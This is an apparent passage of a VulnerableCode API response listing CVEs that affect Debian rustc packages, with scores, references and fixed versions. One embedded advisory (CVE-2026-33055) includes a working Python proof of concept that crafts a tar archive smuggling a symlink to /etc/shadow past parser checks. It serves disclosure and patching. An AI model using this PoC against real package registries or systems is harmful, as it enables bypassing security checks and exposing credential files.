"affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2021-31162" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yv-ngej-1kf7" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/74024?format=api", "vulnerability_id": "VCID-dnx4-ezu6-ffdn", "summary": "rust: Rust standard library did not properly escape arguments when invoking batch files on Windows using the Command API", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-43402.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-43402.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-43402", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66523", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66445", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.6648", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66498", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66482", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66506", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66522", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.6641", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66436", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66406", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66455", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66469", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66488", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00511", "scoring_system": "epss", "scoring_elements": "0.66476", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-43402" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309748", "reference_id": "2309748", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309748" }, { "reference_url": "https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html", "reference_id": "cve-2024-24576.html", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-04T15:46:50Z/" } ], "url": "https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html" }, { "reference_url": "https://learn.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/file-folder-name-whitespace-characters", "reference_id": "file-folder-name-whitespace-characters", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-04T15:46:50Z/" } ], "url": "https://learn.microsoft.com/en-us/troubleshoot/windows-client/shell-experience/file-folder-name-whitespace-characters" }, { "reference_url": "https://github.com/rust-lang/rust/security/advisories/GHSA-2xg3-7mm6-98jj", "reference_id": "GHSA-2xg3-7mm6-98jj", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-04T15:46:50Z/" } ], "url": "https://github.com/rust-lang/rust/security/advisories/GHSA-2xg3-7mm6-98jj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938935?format=api", "purl": "pkg:deb/debian/rustc@0?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@0%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2024-43402" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dnx4-ezu6-ffdn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/193461?format=api", "vulnerability_id": "VCID-eahp-bdsv-mycz", "summary": "The Rust Programming Language Standard Library 1.34.x before 1.34.2 contains a stabilized method which, if overridden, can violate Rust's safety guarantees and cause memory unsafety. If the `Error::type_id` method is overridden then any type can be safely cast to any other type, causing memory safety vulnerabilities in safe code (e.g., out-of-bounds write or read). Code that does not manually implement Error::type_id is unaffected.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12083", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.72798", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.7284", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.7285", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.72842", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.72884", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.72893", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00735", "scoring_system": "epss", "scoring_elements": "0.72889", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73369", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73427", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73378", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73402", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73373", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.7341", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73424", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00764", "scoring_system": "epss", "scoring_elements": "0.73447", "published_at": "2026-04-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12083" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938935?format=api", "purl": "pkg:deb/debian/rustc@0?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@0%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2019-12083" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eahp-bdsv-mycz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23202?format=api", "vulnerability_id": "VCID-ehdy-7aak-r3bt", "summary": "tar-rs incorrectly ignores PAX size headers if header size is nonzero\n### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n> I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n r = len(d) % B\n return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n h = bytearray(B)\n h[0 : len(name)] = name\n h[100:107] = b\"0000644\"\n h[108:115] = h[116:123] = b\"0001000\"\n h[124:135] = f\"{size:011o}\".encode()\n h[136:147] = b\"00000000000\"\n h[148:156] = b\" \"\n h[156:157] = typ\n if link:\n h[157 : 157 + len(link)] = link\n h[257:263] = b\"ustar\\x00\"\n h[263:265] = b\"00\"\n h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used < INFLATED:\n ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: &[u8]) {\n println!(\"tar:\");\n let mut ar = tar::Archive::new(data);\n for e in ar.entries().unwrap() {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\nasync fn async_parse(data: Vec<u8>) {\n println!(\"astral-tokio-tar:\");\n let mut ar = tokio_tar::Archive::new(data.as_slice());\n let mut entries = ar.entries().unwrap();\n while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\n#[tokio::main]\nasync fn main() {\n let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n let data = fs::read(&path).unwrap();\n sync_parse(&data);\n async_parse(data).await;\n}\n```\n\n```\ntar:\n regular.txt Regular\n smuggled Symlink -> /etc/shadow\n\nastral-tokio-tar:\n regular.txt Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01418", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01406", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01412", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01417", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01396", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01404", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01409", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01403", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01893", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01847", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01851", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01861", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055" }, { "reference_url": "https://github.com/alexcrichton/tar-rs", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/alexcrichton/tar-rs" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055" }, { "reference_url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html" }, { "reference_url": "https://www.cve.org/CVERecord?id=CVE-2025-62518", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2025-62518" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480", "reference_id": "1131480", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225", "reference_id": "1135225", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225" }, { "reference_url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "GHSA-gchp-q4r4-x4ff", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" } ], "aliases": [ "CVE-2026-33055", "GHSA-gchp-q4r4-x4ff" ], "risk_score": 3.6, "exploitability": "0.5", "weighted_severity": "7.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ehdy-7aak-r3bt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/31473?format=api", "vulnerability_id": "VCID-f4bw-5erp-4uc6", "summary": "Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-29922", "reference_id": "", 